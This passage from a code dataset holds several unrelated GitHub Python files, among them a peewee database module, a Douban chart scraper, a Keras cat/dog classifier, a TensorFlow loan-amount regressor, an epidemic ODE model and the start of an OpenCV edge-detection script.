DB_USER\n\nprint(f'DB HOST = {DB_HOST}')\n\n\ndbhandle = MySQLDatabase(\n DB_NAME, user=DB_USER,\n password=DB_PASSWORD,\n host=DB_HOST,\n port=DB_PORT\n)\n\n\nclass BaseModel(Model):\n class Meta:\n database = dbhandle\n\n\nclass Report(BaseModel):\n my_id = IntegerField()\n target_id = IntegerField()\n is_offline = BooleanField()\n latency = IntegerField()\n stamp = DateTimeField()\n\n\nclass BountyEvent(BaseModel):\n my_id = IntegerField()\n tx_dt = DateTimeField()\n tx_hash = CharField()\n block_number = IntegerField()\n bounty = CharField()\n downtime = IntegerField()\n latency = IntegerField()\n gas_used = IntegerField()\n\n class Meta:\n db_table = 'bounty_event'\n\n\nclass ReportEvent(BaseModel):\n my_id = IntegerField()\n target_id = IntegerField()\n tx_dt = DateTimeField()\n tx_hash = CharField()\n downtime = IntegerField()\n latency = IntegerField()\n gas_used = IntegerField()\n\n class Meta:\n db_table = 'report_event'\n\n\nclass BountyStats(BaseModel):\n tx_hash = CharField()\n eth_balance_before = CharField()\n eth_balance = CharField()\n skl_balance_before = CharField()\n skl_balance = CharField()\n\n class Meta:\n db_table = 'bounty_stats'\n primary_key = CompositeKey('tx_hash')\n\n\n@dbhandle.connection_context()\ndef save_metrics_to_db(my_id, target_id, is_offline, latency):\n \"\"\" Save metrics (downtime and latency) to database\"\"\"\n report = Report(my_id=my_id,\n target_id=target_id,\n is_offline=is_offline,\n latency=latency)\n report.save()\n\n\n@dbhandle.connection_context()\ndef save_bounty_event(tx_dt, tx_hash, block_number, my_id, bounty, downtime, latency, gas_used):\n \"\"\" Save bounty events data to database\"\"\"\n data = BountyEvent(my_id=my_id,\n tx_dt=tx_dt,\n bounty=bounty,\n downtime=downtime,\n latency=latency,\n gas_used=gas_used,\n tx_hash=tx_hash,\n block_number=block_number)\n\n data.save()\n\n\n@dbhandle.connection_context()\ndef save_report_event(tx_dt, tx_hash, my_id, target_id, downtime, latency, gas_used):\n \"\"\" Save bounty events data to database\"\"\"\n data = ReportEvent(my_id=my_id,\n target_id=target_id,\n tx_dt=tx_dt,\n downtime=downtime,\n latency=latency,\n gas_used=gas_used,\n tx_hash=tx_hash)\n\n data.save()\n\n\n@dbhandle.connection_context()\ndef save_bounty_stats(\n tx_hash,\n eth_bal_before,\n skl_bal_before,\n eth_bal,\n skl_bal):\n \"\"\" Save bounty receipt data to database\"\"\"\n data = BountyStats(tx_hash=tx_hash,\n eth_balance_before=eth_bal_before,\n skl_balance_before=skl_bal_before,\n eth_balance=eth_bal,\n skl_balance=skl_bal\n )\n data.save(force_insert=True)\n\n\n@dbhandle.connection_context()\ndef get_month_metrics_for_node(my_id, target_id, start_date, end_date) -> dict:\n \"\"\" Returns a dict with aggregated month metrics - downtime and latency\"\"\"\n\n downtime_results = Report.select(\n fn.SUM(\n Report.is_offline).alias('sum')).where(\n (Report.my_id == my_id) & (\n Report.target_id == target_id) & (\n Report.stamp >= start_date) & (\n Report.stamp <= end_date))\n\n latency_results = Report.select(\n fn.AVG(\n Report.latency).alias('avg')).where(\n (Report.my_id == my_id) & (\n Report.target_id == target_id) & (\n Report.stamp >= start_date) & (\n Report.stamp <= end_date) & (\n Report.latency >= 0))\n if downtime_results[0].sum is None:\n print(f'Sum result from db is None')\n downtime = int(\n downtime_results[0].sum) if downtime_results[0].sum is not None else 0\n latency = latency_results[0].avg if latency_results[0].avg is not None else 0\n return {'downtime': downtime, 'latency': latency}\n\n\n@dbhandle.connection_context()\ndef clear_all_reports():\n nrows = Report.delete().execute()\n print(f'{nrows} records deleted')\n\n\n@dbhandle.connection_context()\ndef clear_all_bounty_receipts():\n nrows = BountyStats.delete().execute()\n print(f'{nrows} records deleted')\n\n\n@dbhandle.connection_context()\ndef get_count_of_bounty_receipt_records():\n return BountyStats.select().count()\n\n\n@dbhandle.connection_context()\ndef get_count_of_report_records():\n return Report.select().count()\n\n\n@dbhandle.connection_context()\ndef get_bounty_max_block_number():\n return BountyEvent.select(fn.MAX(BountyEvent.block_number)).scalar()\n","repo_name":"skalenetwork/skale-nms","sub_path":"tools/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} +{"seq_id":"70131428854","text":"import requests\nimport bs4\nimport re\nfrom bs4 import BeautifulSoup\n\n\n\n\ndef getHtmlInfo(url):#获取网页文档\n try:\n # dic={\"start\":\"0\",\"type\":\"T\"}\n r=requests.get(url,timeout=30)\n r.raise_for_status() #根据状态码判断是否访问成功\n \n return r.text\n except:\n return \"出错了!\"\n\n\n\n \ndef selectReadInfo(html,urllist):#图书主页html 获取图书分类信息将图书的类别存到urllist列表中\n soup=BeautifulSoup(html,\"html.parser\")#解析\n lis=[]\n ss=\"\"\n for tag in soup(\"ul\",class_=\"clearfix\"):\n if tag.find(\"li\").string !=None:\n print(str(tag.find(\"li\").string).strip(),\":\\n\")#列表标签分类标题\n for tag_ in tag(\"a\",class_=\"tag\"):#遍历出每个分类里的子分类\n if(str(tag_.string)!=\"更多»\"):\n lis.append(str(tag_.string))\n urllist.append(str(tag_.string))\n for s in lis:\n ss+=s+\"\\t\"\n print(ss,\"\\n\\n\")\n ss=\"\"\n lis=[]\n\n\n\n \ndef searchBook(html,lis,liss):#某个种类的图书排行主页html 图书名称及其链接存入lis字典 图书名称存入liss列表方便用户浏览\n print(\"\\n\\n\\n\")\n soup=BeautifulSoup(html,\"html.parser\")\n for tag in soup(\"div\",class_=\"info\"):\n lis[tag.find(\"a\").attrs[\"title\"]]=tag.find(\"a\").attrs[\"href\"]#图书名和图书链接对应放入字典\n liss.append(tag.find(\"a\").attrs[\"title\"])#图书名称放入列表\n print(tag.find(\"a\").attrs[\"title\"]+\"\\n\"+tag.find(\"div\",class_=\"pub\").string+\"\\n\"+tag.find(\"span\",class_=\"pl\").string+\"\\n\"+tag.find(\"p\").string)\n print(\"\\n\\n\\n\\n\\n\\n\\n\")\n #print(lis)\n\n\n\n \n \ndef bookInfo(html):#某个图书信息的html 爬取出图书的相关信息以及部分精彩短评和长的书评\n #print(html[:200])\n i=5\n soup=BeautifulSoup(html,\"html.parser\")\n s=soup.find(\"div\",id=\"info\")\n for tag_ in s(\"span\",class_=\"pl\"):#爬取图书作者 出品方等信息\n if str(tag_.string)==\"作者:\" or str(tag_.string)==\"丛书:\" or str(tag_.string)==\"出品方:\":\n print(tag_.string,tag_.next_sibling.next_sibling.string)\n else:\n print(tag_.string,tag_.next_sibling)\n print(\"豆瓣评分:\",soup.find(\"strong\").string)\n \n for tag in soup(\"span\",class_=\"rating_per\"):#爬取图书评分\n print(i,\"星:\",tag.string)\n i-=1\n ss=soup.find(\"div\",class_=\"intro\")\n print(\"\\n\\n\\n\")\n print(\"内容简介:\")\n for ta in ss(\"p\"):#爬取图书简介\n print(ta.string)\n print(\"\\n\\n\\n\")\n print(\"章节目录:\")\n so=soup.find(\"div\",style=\"display:none\")\n for t in so(\"br\"):#爬取图书部分目录信息\n print(t.previous_sibling)\n j=1\n print(\"\\n\\n\\n\")\n print(\"部分短评:\\n\\n\")\n for pl in soup(\"p\",class_=\"comment-content\"):#爬取部分精彩短评\n print(j,\":\",pl.string,\"\\n\")\n j+=1\n j=1\n print(\"\\n\\n\\n\")\n print(\"部分书评:\\n\\n\")\n for p in soup(\"div\",class_=\"short-content\"):#爬取部分精彩书评\n print(j,\":\",(((str(p).split(\">\"))[1]).split(\"...\"))[0],\"\\n\")\n j+=1\n #print(p)\n \ndef movie(html):#爬取电影排行\n i=1\n soup=BeautifulSoup(html,\"html.parser\")\n for tag in soup(\"div\",class_=\"pl2\"):#循环遍历出具有电影信息的标签 提取电影信息\n print(i,\":\",str(tag.find(\"a\")).split(\">\")[1].split(\"/\")[0].lstrip().rstrip(),\"\\t地址:\",tag.find(\"a\").attrs[\"href\"],\"\\n\")\n i+=1\n\n \ndef music(html):#爬取音乐排行\n i=1\n soup=BeautifulSoup(html,\"html.parser\")\n for tag in soup(\"li\",class_=\"clearfix\"):#循环遍历出具有歌曲信息的标签 提取歌曲信息\n if i<=10:\n t=tag.find(\"div\")\n print(i,\":\",t.find(\"a\").string)\n #print(t.find(\"p\"))\n print(str(t.find(\"p\")).split(\"/\")[1].split(\"<\")[0].lstrip(),\"\\n\")\n i+=1\n \n\ndef main():\n selectP={\"读书\":\"book\",\"音乐\":\"music\",\"电影\":\"movie\",\"退出\":\"break\"}\n while 1:\n string=str(input(\"请输��想查看的类别(读书、音乐、电影、退出):\"))\n print(\"\\n\")\n if string in selectP.keys():\n url=\"http://\"+selectP.get(string)+\".douban.com\"#根据输入内容更改url信息\n if string==\"读书\":\n urllist=[]\n selectReadInfo(getHtmlInfo(url),urllist)#获取图书分类信息\n #print(\"\\n\")\n #print(urllist)\n string=str(input(\"请输入想读的图书种类:\"))\n string2=int(input(\"请输入想读的页数:\"))\n if string in urllist and string2<=10:#爬取相应图书种类的多少页图书排行\n lis={}\n liss=[]\n for i in range(string2):\n url=\"http://book.douban.com/tag/\"+string+\"?start=\"+str(i*20)+\"&type=T\" #每一页的url\n searchBook(getHtmlInfo(url),lis,liss)#获取图书名称和对应的连接\n print(\"书单表:\\n\\n\")\n print(liss)\n print(\"\\n\\n\\n\\n\\n\\n\")\n string=str(input(\"请输入想查看的图书名称:\"))\n if string in lis.keys():\n bookInfo(getHtmlInfo(lis[string]))#获取图书具体信息和评论等\n if string ==\"电影\":\n url=\"http://movie.douban.com/chart\"\n movie(getHtmlInfo(url))#爬取部分电影排行\n if string ==\"音乐\":\n url=\"http://music.douban.com/chart\"\n music(getHtmlInfo(url))#爬取部分音乐排行\n if string ==\"退出\":\n break\nif __name__==\"__main__\":\n main()\n","repo_name":"zmyymz/Python","sub_path":"DouB.py","file_name":"DouB.py","file_ext":"py","file_size_in_byte":5787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40251126667","text":"def subP(target, nums):\n total = left = right = 0\n mini = math.inf\n while right < len(nums):\n total += nums[right]\n while total >= target:\n total -= nums[left]\n left += 1\n mini = min(mini, right-left+2)\n right+=1\n return mini if mini != math.inf else 0\n","repo_name":"Naboni/Competitive-Programming","sub_path":"Week 5/MinSubArrayLen.py","file_name":"MinSubArrayLen.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72115884532","text":"import pandas as pd\r\nimport numpy as np\r\nfrom keras.preprocessing.image import *\r\nfrom keras.utils import to_categorical\r\nfrom sklearn.model_selection import train_test_split\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport os\r\nimport sys\r\n\r\nimport io\r\n\r\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\r\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\r\n\r\n\r\n\r\npath = \"C:/Users/css04/OneDrive/바탕 화면/catdog/\" # 데이터의 경로\r\n\r\n# 데이터 형상 관련 상수 정의\r\nIMAGE_WIDTH=128\r\nIMAGE_HEIGHT=128\r\nIMAGE_SIZE=(IMAGE_WIDTH, IMAGE_HEIGHT)\r\nIMAGE_CHANNEL=3\r\n\r\n# 학습 데이터 준비\r\nfilenames = os.listdir(path + \"train\")\r\n# os.listdir() 메소드는 지정한 디렉토리 내의 모든 파일과 디렉토리의 리스트를 반환한다.\r\ncategories=[]\r\nfor filename in filenames:\r\n category=filename.split(\".\")[0] # category는 ‘.’을 기준으로 첫 번째로 정한다.\r\n if category ==\"dog\": # ‘.’ 이전의 file 이름이 ‘dog’로 되어 있다면\r\n categories.append(1) # 리스트에 1을 넣는다.\r\n else: # category가 cat으로 되어 있다면\r\n categories.append(0) # 리스트에 0을 넣는다.\r\ndf = pd.DataFrame(\r\n {\"filename\":filenames, # filename은 filenames에서 가져옴\r\n \"category\":categories} # category와 filenames을 짝지은다.\r\n)\r\ndf\r\n\r\nsample = random.choice(filenames) # filenames에서 무작위로 한 개를 선정\r\nimage = load_img(path+\"train/\"+sample) # 선정된 이미지의 경로를 가져온다.\r\nplt.imshow(image) # 가져온 이미지를 보여준다.\r\nfrom keras.models import Sequential\r\n# Sequential 모델은 레이러를 선형으로 연결하여 구성\r\n# 레이어 인스턴스를 생성자에게 넘겨줌으로써 Sequential 모델을 구성할 수 있습니다.\r\nfrom keras.layers import *\r\n# import keras.layers와 문법상 동일\r\n# keras.layers의 모든 모듈을 가져온다.\r\n# from 모듈 import 메소드/변수\r\n\r\n# 레이어 1\r\nmodel = Sequential()\r\nmodel.add(Conv2D(32, (3,3), activation=\"relu\", input_shape=(IMAGE_HEIGHT, IMAGE_WIDTH , IMAGE_CHANNEL)))\r\n# add 메소드를 통해 Sequential 모델을 점진적으로 작성\r\n# relu : 입력이 0 이하면 0으로 침묵, 0을 넘으면 입력 그대로를 출력하는 함수\r\nmodel.add(BatchNormalization())\r\n# 배치정규화\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\n# 풀링 이유 :\r\n# 1. 이미지의 크기를 줄이면서 데이터의 손실을 막기 위해서\r\n# 2. 합성곱 계층의 과적합을 막기 위해서 ( 견해에 따라 딥러닝 모델 자체가 과적합 하려고 하는 건데 방지한다는 것이 이상하다는 견해도 있음. )\r\nmodel.add(Dropout(0.25))\r\n# 노드를 학습에서 무시 ( 과적합 방지 )\r\n\r\n# 레이어 2\r\nmodel.add(Conv2D(64, (3,3), activation=\"relu\"))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\n\r\n# 레이어3\r\nmodel.add(Conv2D(128, (3,3), activation=\"relu\"))\r\nmodel.add(BatchNormalization())\r\nmodel.add(MaxPooling2D(pool_size=(2,2)))\r\nmodel.add(Dropout(0.25))\r\n\r\n# Fully Connected\r\nmodel.add(Flatten())\r\nmodel.add(Dense(512, activation='relu'))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Dropout(0.5))\r\n\r\nmodel.add(Dense(2,activation=\"softmax\"))\r\n\r\n# 모델 실행 옵션\r\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"rmsprop\", metrics=['accuracy'])\r\nmodel.summary()\r\n\r\n# reduceLROnPlateau\r\n# : callback 함수의 일종, learning rate가 더이상 업데이트가 되지 않으면, 학습을 중단하여라\r\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau\r\n\r\nearlystop = EarlyStopping(patience=10)\r\nlearning_rate_reduction=ReduceLROnPlateau(\r\n monitor= \"val_accuracy\",\r\n patience = 2,\r\n factor = 0.5,\r\n min_lr=0.0001,\r\n verbose=1)\r\n\r\ncallbacks = [earlystop, learning_rate_reduction]\r\n\r\n# 이미지 제너레이터에서 class_mode = \"categorical\"로 지정하기 위해 컬럼 카테고리를 스트링으로 변경함.\r\ndf['category']=df['category'].replace({0:'cat',1:\"dog\"})\r\n\r\ntrain_df, validate_df = train_test_split(df , test_size=0.2, random_state= 42)\r\n\r\ntrain_df=train_df.reset_index(drop=True)\r\nvalidate_df=validate_df.reset_index(drop=True)\r\n\r\n\r\ntrain_df['category'].value_counts()\r\n# >>>\r\n# dog 10015\r\n# cat 9985\r\n# Name: category, dtype: int64\r\n\r\nvalidate_df['category'].value_counts()\r\n# >>>\r\n# cat 2515\r\n# dog 2485\r\n# Name: category, dtype: int64\r\n\r\ntotal_train=train_df.shape[0]\r\ntotal_validate=validate_df.shape[0]\r\nbatch_size=15\r\n\r\n# 트레이닝 데이터의 제너레이터 설정\r\ntrain_datagen=ImageDataGenerator(\r\n rotation_range=15,\r\n rescale=1./255,\r\n shear_range=0.1,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n width_shift_range=0.1,\r\n height_shift_range=0.1)\r\n\r\ntrain_generator=train_datagen.flow_from_dataframe(\r\n train_df,\r\n path+\"train\",\r\n x_col = \"filename\",\r\n y_col = \"category\",\r\n target_size = IMAGE_SIZE,\r\n class_mode = \"categorical\",\r\n batch_size = batch_size )\r\n\r\nvalidate_datagen=ImageDataGenerator(rescale=1./255)\r\n# 검증이미지니까, 사진 그대로 쓰겠다.\r\n\r\nvalidation_generator=validate_datagen.flow_from_dataframe(\r\n validate_df,\r\n path+\"train\",\r\n x_col= \"filename\",\r\n y_col= \"category\",\r\n target_size = IMAGE_SIZE,\r\n class_mode = \"categorical\",\r\n batch_size = batch_size )\r\n\r\nexample_df=train_df.sample(n=1).reset_index(drop=True)\r\nexample_df\r\n\r\nexample_generator = train_datagen.flow_from_dataframe(\r\n example_df,\r\n path+\"train\",\r\n x_col = \"filename\",\r\n y_col = \"category\",\r\n target_size = IMAGE_SIZE,\r\n class_mode = \"categorical\")\r\n\r\nplt.figure(figsize=(10,10))\r\nfor i in range(0,15):\r\n plt.subplot(5,3,i+1)\r\n for xBatch, yBatch in example_generator:\r\n image = xBatch[0]\r\n plt.imshow(image)\r\n break\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nepochs = 3\r\n\r\nhistory = model.fit_generator(\r\n train_generator,\r\n epochs = epochs,\r\n steps_per_epoch = total_train//batch_size ,\r\n validation_data= validation_generator,\r\n validation_steps = total_validate//batch_size,\r\n callbacks = callbacks,\r\n)\r\n\r\n# 모델 저장\r\nmodel.save_weights(\"model.h5\")\r\n\r\nhistoryDict=history.history\r\n\r\nacc=history.history['accuracy']\r\nval_acc=history.history['val_accuracy']\r\nloss=history.history['loss']\r\nval_loss=history.history['val_loss']\r\n\r\nepo = range(1, len(acc)+1)\r\nplt.plot(epo, loss, 'bo', label=\"Traing loss\")\r\nplt.plot(epo, val_loss, 'b', label=\"Val loss\")\r\nplt.xlabel(\"epoch\")\r\nplt.ylabel(\"Loss\")\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(epo, acc, 'ro', label=\"Traing accuracy\")\r\nplt.plot(epo, val_acc, 'r', label=\"Val accuracy\")\r\nplt.xlabel(\"epoch\")\r\nplt.ylabel(\"Accuracy\")\r\nplt.legend()\r\nplt.show()\r\n\r\nplt.plot(epo, acc, 'ro', label=\"Traing accuracy\")\r\nplt.plot(epo, val_acc, 'r', label=\"Val accuracy\")\r\nplt.xlabel(\"epoch\")\r\nplt.ylabel(\"Accuracy\")\r\nplt.legend()\r\nplt.show()\r\n\r\ntest_datagen=ImageDataGenerator(rescale=1./255)\r\n# 테스트 이미지니까, 사진 그대로 씀\r\ntest_generator=test_datagen.flow_from_dataframe(\r\n test_df,\r\n path+\"test\",\r\n x_col= \"filename\",\r\n y_col= None,\r\n target_size = IMAGE_SIZE,\r\n class_mode = None,\r\n batch_size = batch_size,\r\n shuffle = False)\r\n\r\n# 3. 예측\r\npredict=model.predict_generator(test_generator,\r\n steps=nbsamples/batch_size,\r\n callbacks=callbacks)\r\n\r\ntest_df['category']=np.argmax(predict, axis=1)\r\n\r\ntest_df['category']=test_df['category'].replace({0:'cat',1:\"dog\"})\r\nex_df=test_df.sample(n=1).reset_index(drop=True)\r\nex_df\r\n\r\nex_generator = test_datagen.flow_from_dataframe(\r\n ex_df,\r\n path+\"test\",\r\n x_col = \"filename\",\r\n y_col = None,\r\n target_size = IMAGE_SIZE,\r\n class_mode = None)\r\ntest_sample=list(ex_df.filename)\r\n\r\nsample = \"\"\r\nfor test in test_sample:\r\n sample += test\r\nimage = load_img(path+\"test/\"+sample)\r\nplt.figure(figsize=(8,8))\r\nplt.imshow(image)\r\n\r\nplt.tight_layout()\r\nplt.show()\r\n\r\nsampleSubmission=pd.read_csv(path+\"sampleSubmission.csv\", dtype=\"object\")\r\nsampleSubmission\r\n\r\nindex=[]\r\nfor filename in test_df.filename:\r\n li=filename.split(\".\")[0]\r\n index.append(li)\r\n\r\ntest_df[\"id\"]=index\r\n\r\nfinal=test_df.merge(sampleSubmission)[['id','category']]\r\nfinal['id']=final['id'].astype(\"int64\")\r\nfinal=final.sort_values(\"id\")\r\n\r\nfinal.rename({'category':\"label\"},axis='columns').to_csv(\"Submission.csv\", index=False)\r\n","repo_name":"css04146/image_classification","sub_path":"catdog.py","file_name":"catdog.py","file_ext":"py","file_size_in_byte":8798,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20907928555","text":"# 다리들 중 최솟값을 골라 더하는 부분이 막혀서 정답 참고했음\n# bfs로 라벨링, 다리놓기 했고, MST 크루스칼로 다리 길이 최솟값 구함\n\"\"\"\n모든 섬을 연결하는 다리 길이의 최솟값 구하기\n\n조건\n1. 모든 섬을 연결하는 것이 불가능하면 -1 출력\n2. 다리 길이는 2 이상\n3. 다리는 중간에 방향 전환 불가\n\nIDEA\n1. 우선 땅이 먼저 나오는 곳에서 bfs 탐색 시작\n 'dictionary[(x, y)] = 섬의 번호' 로 저장함\n2. 섬 dictionary를 bfs로 돌면서 다리를 놓음\n3. 크루스칼 MST로 최소 다리 길이를 구함\n\"\"\"\n\nimport sys, collections\nfrom collections import deque\nsys.stdin = open(\"BFS/input.txt\",'r')\ninput = sys.stdin.readline\n\n# 세로 크기 N과 가로 크기 M\nn, m = map(int, input().strip().split())\n\n# 섬 dictionary\nislandNum = 0 # 섬의 개수 stack - dictionary key 용 / 2 ≤ 섬의 개수 ≤ 6\nisland = collections.defaultdict(list)\nlandArr = []\n\n# 지도\nMAP = [list(map(int, input().strip().split())) for _ in range(n)]\n\n# 좌표 이동용\nmove = [(0,1),(1,0),(0,-1),(-1,0)]\n\n# (a, b)에서부터 bfs로 땅 찾기\ndef bfs_find_island(a, b):\n global islandNum\n # 방문 처리\n visited[a][b] = True\n # 큐 생성\n q = deque([(a, b)]) # 시작 값 큐에 append\n # 딕셔너리 update\n island[(a, b)] = islandNum\n landArr.append((a, b, islandNum))\n # bfs 시작\n while q:\n x, y = q.popleft() # 다음 좌표 꺼내기\n for a, b in move: # 동서남북 돌면서 땅 찾기\n nx, ny = x+a, y+b\n # 새로운 좌표가 MAP 안에 들어가고, 바다가 아니라면\n if 0<=nxnx>=0 and m>ny>=0:\n toLand = island.get((nx,ny))\n # 같은 섬\n if curLand==toLand:\n break\n # 바다 위, 다리 길이 +1\n if toLand == None:\n nx+=a; ny+=b\n dist+=1\n continue\n # 다리가 짧음\n if dist < 2:\n break\n # 다른 섬을 만나면 다리 놓기 끝\n edges.append((dist,curLand,toLand))\n break\n else:\n break\nedges = sorted(edges,reverse=True)\n\n# 크루스칼 MST 진행\ndef union(x,y):\n x, y = find(x), find(y)\n if x!=y:\n if x>y:\n parents[x] = y\n else:\n parents[y] = x\n\ndef find(k):\n if k == parents[k]:\n return k\n parents[k] = find(parents[k])\n return parents[k]\n\nans = 0\ncnt = islandNum-1\nparents = [i for i in range(islandNum)]\nwhile cnt:\n try:\n w,a,b = edges.pop()\n except:\n # 저장된 다리들이 없을 때\n print(-1)\n exit(0)\n if find(a) != find(b): # 모든 섬을 연결하는 다리 길이의 최솟값\n union(a,b)\n ans += w\n cnt-=1\nprint(ans)\n\n","repo_name":"Suyeon-B/week03_team","sub_path":"suyeon/BFS/17472 다리 만들기 2 retry.py","file_name":"17472 다리 만들기 2 retry.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27084830206","text":"#!/usr/bin/python\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport itertools, tensorflow as tf, numpy as np, pandas as pd\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\nCOLUMNS=['AsofYear','RespondentID','AgencyCode','LoanType','PropertyType','LoanPurpose','Occupancy','LoanAmount000s','Preapproval','ActionType','MSAMD','StateCode','CountyCode','CensusTractNumber','ApplicantEthnicity','CoApplicantEthnicity','ApplicantRace1','ApplicantRace2','ApplicantRace3','ApplicantRace4','ApplicantRace5','CoApplicantRace1','CoApplicantRace2','CoApplicantRace3','CoApplicantRace4','CoApplicantRace5','ApplicantSex','CoApplicantSex','ApplicantIncome000s','PurchaserType','DenialReason1','DenialReason2','DenialReason3','RateSpread','HOEPAStatus','LienStatus','EditStatus','SequenceNumber','Population','MinorityPopulationPct','FFIECMedianFamilyIncome','TracttoMSAMDIncomePct','NumberofOwner-occupiedunits','Numberof1-to4-Familyunits','ApplicationDateIndicator']\n\nFEATURES=['AsofYear','AgencyCode','LoanType','PropertyType','LoanPurpose','Occupancy','Preapproval','ActionType','MSAMD','StateCode','CountyCode','CensusTractNumber','ApplicantEthnicity','CoApplicantEthnicity','ApplicantRace1','CoApplicantRace1','ApplicantSex','CoApplicantSex','ApplicantIncome000s','PurchaserType','HOEPAStatus','LienStatus','SequenceNumber','Population','MinorityPopulationPct','FFIECMedianFamilyIncome','TracttoMSAMDIncomePct','ApplicationDateIndicator']\n\nLABEL=['LoanAmount000s']\n\ntraining_set = pd.read_csv(\"data/training_CHI.csv\", names=COLUMNS)\ntesting_set = pd.read_csv(\"data/test_LAX.csv\", names=COLUMNS)\nprediction_set = pd.read_csv(\"data/prediction_NYC.csv\", names=COLUMNS)\n\nfeature_cols = [tf.feature_column.numeric_column(k) for k in FEATURES]\n\nregressor = tf.estimator.DNNRegressor(feature_columns=feature_cols,\n hidden_units=[10, 10])\n\ndef get_input_fn(data_set, num_epochs=None, shuffle=True):\n return tf.estimator.inputs.pandas_input_fn(\n x=pd.DataFrame({k: data_set[k].values for k in FEATURES}),\n y = pd.Series(data_set[LABEL].astype(int)),\n num_epochs=num_epochs,\n shuffle=shuffle)\n\nregressor.train(input_fn=get_input_fn(training_set), steps=5)\n\nev = regressor.evaluate(\n input_fn=get_input_fn(test_set, num_epochs=1, shuffle=False))\n\nloss_score = ev[\"loss\"]\nprint(\"Loss: {0:f}\".format(loss_score))\n\ny = regressor.predict(\n input_fn=get_input_fn(prediction_set, num_epochs=1, shuffle=False))\n# .predict() returns an iterator of dicts; convert to a list and print\n# predictions\npredictions = list(p[\"predictions\"] for p in itertools.islice(y, 6))\nprint(\"Predictions: {}\".format(str(predictions)))\n\n","repo_name":"manubhardwaj/tensorflow-demo","sub_path":"hmda/hmda.py","file_name":"hmda.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11065051694","text":"import numpy as np\nfrom scipy.integrate import odeint\nimport matplotlib.pyplot as plt\n\ndef dAdt(A, t, beta, gamma, N, nu, alpha, eta):\n #definindo as variáveis.\n S = A[0]\n E = A[1]\n I = A[2]\n R = A[3]\n D = A[4]\n V = A[5]\n return [\n -beta/N * S * I - v*S,\n beta/N * S * I - alpha * E,\n alpha * E - gamma * I,\n gamma * (1 - eta) * I,\n gamma * eta * I,\n v*S\n ]\n\n#Quanto tempo será simulado\ntimes = np.arange(0, 500, 1)\n\n#definindo os valores das constantes\ngamma = 0.083\nN = 1e7\nbeta = 0.20\nv = 0.04\nalpha = 0.192\neta = 0.024\n\n#Valores iniciais das variáveis\nS0, E0, I0, R0, D0, V0 = N-800, 800, 0, 0, 0, 0\n\n#resolvendo a ODE.\nsol = odeint(dAdt, y0=[S0, E0, I0, R0, D0, V0],t=times, args=(beta, gamma, N, v, alpha, eta))\n\n#plotando os gráficos.\nS = sol.T[0]\nE = sol.T[1]\nI = sol.T[2]\nR = sol.T[3]\nD = sol.T[4]\nV = sol.T[5]\n\nplt.figure(facecolor='w',figsize=(30,10))\nplt.plot(times, S)\nplt.plot(times, E)\nplt.plot(times, I)\nplt.plot(times, R)\nplt.plot(times, D)\nplt.plot(times, V)\n\nplt.grid()\nplt.show()\n\n","repo_name":"jefersonseverino/MetodosNumericos","sub_path":"metodos.py","file_name":"metodos.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6461601061","text":"import numpy as np\nimport cv2\nimport os\n\ndef edge():\n image = cv2.imread(os.path.join(\"input_imgs\", \"i.jpg\"))\n # inserir o caminho da imagem manualmente\n hls = cv2.cvtColor(image, cv2.COLOR_BGR2HLS)\n lower = np.array([0, 0, 0])\n upper = np.array([255, 75, 255])\n\n blackmask = cv2.inRange(hls, lower, upper)\n kernel = np.ones((7, 7), np.uint8)\n opening = cv2.morphologyEx(blackmask, cv2.MORPH_OPEN, kernel)\n\n edges = cv2.Canny(opening, 150, 240, apertureSize=3)\n\n cv2.imwrite(\"edges.jpg\", edges)\n #cv2.imwrite('mask'+str(n+1)+\".jpeg\", blackmask)\n minLineLength = 150\n lines = cv2.HoughLinesP(edges, rho=1, theta=np.pi/180, threshold=100,\n lines=[], minLineLength=minLineLength, maxLineGap=20)\n\n a, b, c = lines.shape\n m = []\n b = []\n line_poly = []\n poly = [0, 0, 0]\n right_lines = []\n left_lines = []\n # print(len(lines))\n for i in range(len(lines)):\n ang = (180/np.pi)*np.arctan((lines[i][0][3] -\n lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]))\n poly = [(lines[i][0][3]-lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]), lines[i][0]\n [1]-((lines[i][0][3]-lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]))*lines[i][0][0], lines[i][0]]\n line_poly.append(poly)\n for i in range(len(line_poly)):\n ang = (180/np.pi)*np.arctan((lines[i][0][3] -\n lines[i][0][1])/(lines[i][0][2]-lines[i][0][0]))\n if abs(ang) > 20 and abs(ang) < 80:\n if line_poly[i][0] < 0:\n left_lines.append(line_poly[i])\n else:\n right_lines.append(line_poly[i])\n\n left_x = []\n right_x = []\n if len(left_lines) > 0:\n for j in range(len(left_lines)):\n left_x.append(560/left_lines[j][0] -\n left_lines[j][1]/left_lines[j][0])\n x_main = 